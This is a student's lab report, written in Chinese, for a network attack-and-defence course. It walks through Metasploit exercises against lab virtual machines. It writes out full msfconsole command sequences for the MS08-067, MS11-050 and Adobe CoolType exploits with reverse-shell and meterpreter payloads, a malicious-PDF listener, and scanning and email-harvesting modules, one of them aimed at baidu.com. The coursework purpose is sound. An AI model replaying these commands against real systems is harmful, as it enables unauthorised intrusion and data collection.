20155333 《網絡對抗》 Exp5 MSF基礎應用

20155333 《網絡對抗》 Exp5 MSF基礎應用

基礎問題回答

用本身的話解釋什麼是exploit,payload,encode

• exploit:攻擊手段，是能使攻擊武器（payload）的方法；
• payload:攻擊武器，真正具備攻擊性的代碼；
• encode:編碼方式，根據payload將要被放置的環境選擇合適的編碼方式，使它可以正常的運行。

實踐

一個主動攻擊實踐，如ms08_067

①攻擊機：kali ②靶機：windows XP SP3(English)

在攻擊機kali輸入msfconsole進入控制檯，依次輸入如下指令：

msf > use exploit/windows/smb/ms08_067_netapi//使用ms08_067漏洞，use後實際上是漏洞所在目錄路徑名

msf exploit(ms08_067_netapi) > show payloads//顯示回連攻擊載荷

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回連

msf exploit(ms08_067_netapi) > set LHOST 192.168.43.146 //攻擊機ip

msf exploit(ms08_067_netapi) > set LPORT 5333 //攻擊端口

msf exploit(ms08_067_netapi) > set RHOST 192.168.43.18 //靶機ip，特定漏洞端口已經固定

msf exploit(ms08_067_netapi) > set target 0//自動選擇目標系統類型，匹配度較高

msf exploit(ms08_067_netapi) > exploit //攻擊

創建會話，攻擊成功結果以下：

一個針對瀏覽器的攻擊，如ms11_050

①攻擊機：kali ②靶機：WindowsXP Professional sp2/Windows7專業版 ③IE版本：7.0/8.0

在攻擊機kali輸入msfconsole進入控制檯，依次輸入如下指令：

msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用瀏覽器ms11_050漏洞

msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回連

msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.146 //攻擊機ip

msf exploit(ms11_050_cobjectelement) > set LPORT 5333 //攻擊端口固定

msf exploit(ms11_050_cobjectelement) > set URIPATH 5333rh123 //統一資源標識符路徑設置

msf exploit(ms11_050_cobjectelement) > exploit

在瀏覽器輸入http://192.168.43.146:8080/5333rh123，IE出現數據執行保護彈窗和警告彈窗，遇到問題需關閉程序：

修改Internet的安全設置後仍舊失敗了！

一個針對客戶端的攻擊，如Adobe

①攻擊機：kali ②靶機：windowsXP Professional sp2 ③Adobe版本：9.3

在攻擊機kali輸入msfconsole進入控制檯，依次輸入如下指令：

msf > use windows/fileformat/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回連

msf exploit(adobe_cooltype_sing) > set LHOST 192.168.199.170 //攻擊機ip

msf exploit(adobe_cooltype_sing) > set LPORT 5333 //攻擊端口

msf exploit(adobe_cooltype_sing) > set FILENAME 20155333.pdf //設置生成pdf文件的名字

msf exploit(adobe_cooltype_sing) > exploit//攻擊

成功生成20155333.pdf:

將pdf文件傳送或拷貝到靶機上後，在kali上輸入back退出當前模塊，進入監聽模塊，輸入如下命令：

msf > use exploit/multi/handler //進入監聽模塊

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向鏈接

msf exploit(handler) > set LHOST 192.168.199.170 //攻擊機ip

msf exploit(handler) > set LPORT 5333 //攻擊端口固定

msf exploit(handler) > exploit

而後在靶機上打開20155333.pdf文件

鏈接失敗 ，大概是由於我下載的是Abode Reader XI，已經沒有漏洞了。

成功應用任何一個輔助模塊

可使用命令msf > show auxiliary查看全部的輔助模塊：
1、掃描端口

msf > use auxiliary/scanner/portscan/syn//使用portscan模塊

msf auxiliary(syn) > show options

msf auxiliary(syn) > set RHOSTS 192.168.199.140//目標

msf auxiliary(syn) > set THREADS 50//線程

msf auxiliary(syn) > exploit

2、ssh服務器掃描

msf > use auxiliary/scanner/ssh/ssh_version //使用ssh_version模塊

msf auxiliary(ssh_version) > show options //查看選項

msf auxiliary(ssh_version) > set RHOSTS 10.107.100.0/24//目標網段

msf auxiliary(ssh_version) > set THREADS 50//線程

msf auxiliary(ssh_version) > exploit
3、telnet服務器掃描

msf > use auxiliary/scanner/telnet/telnet_version //使用telnet_version模塊

msf auxiliary(telnet_version) > show options //查看選項

msf auxiliary(telnet_version) > set RHOSTS 10.180.100.0/24//目標網段

msf auxiliary(telnet_version) > set THREADS 50//線程

msf auxiliary(telnet_version) > exploit

4、搜索網站中的Email地址

msf > use auxiliary/gather/search_email_collector //使用search_email_collector模塊

msf auxiliary(search_email_collector) > show options//查看選項

msf auxiliary(search_email_collector) > set DOMAIN baidu.com//掃描目標

msf auxiliary(search_email_collector) > exploit

5、掃描局域網有多少主機存活

msf > use auxiliary/scanner/discovery/arp_sweep //使用discovery/arp_sweep模塊

msf auxiliary(arp_sweep) > show options //查看選項

msf auxiliary(arp_sweep) > set RHOSTS 10.180.100.0/24//目標網段

msf auxiliary(arp_sweep) > set THREADS 50//線程

msf auxiliary(arp_sweep) > exploit

嘗試利用ms11_006_createsizeddibsection漏洞進行攻擊

實驗總結與體會

此次實驗的過程能夠說是很艱難了，即便參考了學長和其餘同窗的博客，依舊沒能成功作完全部實踐，但願可以改進吧。